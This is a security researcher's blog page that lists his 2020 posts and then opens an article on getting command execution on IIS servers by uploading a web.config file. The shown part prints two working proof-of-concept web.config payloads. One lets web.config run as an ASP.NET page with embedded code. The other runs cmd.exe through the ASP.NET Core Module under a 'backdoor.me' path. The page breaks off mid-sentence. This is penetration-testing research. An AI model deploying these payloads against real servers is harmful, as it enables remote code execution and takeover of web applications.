secproject.comSoroush Dalili (@irsdl) – سروش دلیلی | Web AppSec ninja, a semicolon enthusiast!

Soroush Dalili (@irsdl) – سروش دلیلی Web AppSec ninja, a semicolon enthusiast! Menu Skip to content Home Advisories Privacy Policy My MDSec Blog Posts so far in 2020! Lately I have only published blog posts through the MDSec website. I thought it might be a good idea to link what I have published so far here as well: Covert Web Shells in .NET with Read-Only Web Paths Analysis of CVE-2020-0605 – Code Execution using XPS Files in .NET Introducing YSoSerial.Net April 2020 Improvements A Security Review of SharePoint Site Pages CVE-2020-0618: RCE in SQL Server Reporting Services (SSRS) Code injection in Workflows leading to SharePoint RCE (CVE-2020-0646) COVID-19 has sadly affected many if not all of us. I hope everyone remains safe and we can all carry on the normal life we had before this crisis. Hopefully I can then publish more blog posts here as well. This entry was posted in My Advisories , Security Posts and tagged .Net Framework , asp.ne , code injection , covid-19 , deserialisation , deserialization , Exploit , mdsec , sharepoint , ssrs , weblogs , website vulnerability , workflows , xps , ysoserial.net on October 31, 2020 by Soroush Dalili . File Upload Attack using XAMLX Files I have recently published a blog post on use of .XAMLX files to execute command on an IIS based application. This blog has been has been published by NCC and is accessible here: https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/august/getting-shell-with-xamlx-files/ Here is its little Twitter story: And here we go https://t.co/KTVukFkFn6 – that was fast @NCCGroupInfosec ! Thanks :) — Soroush Dalili (@irsdl) August 23, 2019 This technique can come in handy when dealing with a file uploader that uses a blacklist approach to stop malicious extensions. Interestingly, if you just search XAMLX in Google or Bing , this technique will be in the first page so it has taken over so many of its actual legitimate usage! This entry was posted in Security Posts and tagged file upload , file upload bypass , file uploader security bypass , IIS File Extension Security Bypass , Unrestricted File Upload , xaml , xamlx on September 21, 2019 by Soroush Dalili . Uploading web.config for Fun and Profit 2 Table of Contents: Introduction 1. Execute command using web.config in the root or an application directory 1.1. Executing web.config as an ASPX page 1.2. Running command using AspNetCoreModule 1.3. Using Machine Key 1.4. Using JSON_AppService.axd 2. Execute command using web.config in a subfolder/virtual directory 2.1. Abusing the compilerOptions attribute 2.1.1. Creating a web shell 2.1.2. Taking over existing ASPX files 2.1.3. Stealing internal files 2.1.4. Stealing more data about the app 2.2. Taking over existing/uploaded .NET files 2.3. Stored XSS 2.3.1. Using StateApplication hanlder 2.3.2. Using DiscoveryRequestHandler hanlder 3. Prevention techniques 4. Behind the scene 4.1. Requirements and resources 4.2. Compiler options 4.3. Exploring new handlers 4.3.1. Handlers limit in a subfolder 4.4. Temporary and compiled files 5. References Introduction This is the second part of my Uploading web.config For Fun and Profit! I wrote the original blog post back in 2014 [1] in which I had described a method to run ASP classic code as well as performing stored XSS attacks only by uploading a web.config file. In this blog post, as well as focusing on running the web.config file itself, I have covered other techniques that can come in handy when uploading a web.config in an application on IIS. My main goal is to execute code or commands on the server using a web.config file and have added more techniques for stored XSS as well. The techniques described here have been divided into two major groups depending on whether a web.config file can be uploaded in an application root or in a subfolder/virtual directory. Please see [2] if you are not familiar with virtual directory and application terms in IIS. Another blog post of mine can also be helpful to identify a virtual directory or an application during a blackbox assessment [3] . 1. Execute command using web.config in the root or an application directory This method can be very destructive where an application already uses a web.config file that is going to be replaced with ours which might not have all the required settings such as the database connection string or some valid assembly references. It is recommended to not use this technique on live websites when an application might have used a web.config file which is going to be replaced. IIS applications that are inside other applications or virtual directories might not use a web.config file and are generally safer candidates than website’s root directory. The following screenshot shows an example of an internal application anotherapp inside the testwebconfig application which is also inside the Default Web Site . There are many methods that can be used to execute commands on a server if the web.config file within the root directory of an application can be modified. I have included four interesting examples in this blog posts which are as follows. 1.1. Executing web.config as an ASPX page This is very similar to [1] but as we are uploading a web.config file within the root directory of an application, we have more control and we can use the managed handlers to run a web.config file as an ASPX page. The following web.config file shows an example: <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="web.config" verb="*" type="System.Web.UI.PageHandlerFactory" modules="ManagedPipelineHandler" requireAccess="Script" preCondition="integratedMode" /> <add name="web_config-Classic" path="web.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\Microsoft.NET\Framework64\v4.0.30319\aspnet_isapi.dll" requireAccess="Script" preCondition="classicMode,runtimeVersionv4.0,bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> <validation validateIntegratedModeConfiguration="false" /> </system.webServer> <system.web> <compilation defaultLanguage="vb"> <buildProviders> <add extension=".config" type="System.Web.Compilation.PageBuildProvider" /> </buildProviders> </compilation> <httpHandlers> <add path="web.config" type="System.Web.UI.PageHandlerFactory" verb="*" /> </httpHandlers> </system.web> </configuration> <!-- ASP.NET code comes here! It should not include HTML comment closing tag and double dashes! <% Response.write("-"&amp;"->") ' it is running the ASP code if you can see 3 by opening the web.config file! Response.write(1+2) Response.write("<!-"&amp;"-") %> --> It is then possible to browse the web.config file to run it as an ASP.NET page. Obviously the XML contents will also be accessible from the web. Perhaps it is just easier to upload another file with an allowed extension such as a .config , .jpg or .txt file and run that as a .aspx page. 1.2. Running command using AspNetCoreModule It is also possible to run a command using the ASP.NET Core Module as shown below: <?xml version="1.0" encoding="utf-8"?> <configuration> <system.webServer> <handlers> <remove name="aspNetCore" /> <add name="aspNetCore" path="backdoor.me" verb="*" modules="AspNetCoreModule" resourceType="Unspecified" /> </handlers> <aspNetCore processPath="cmd.exe" arguments="/c calc"/> </system.webServer> </configuration> The stated command would be executed by browsing the backdoor.me page which does not need to exist on the server! A PowerShell command can be used here as an example...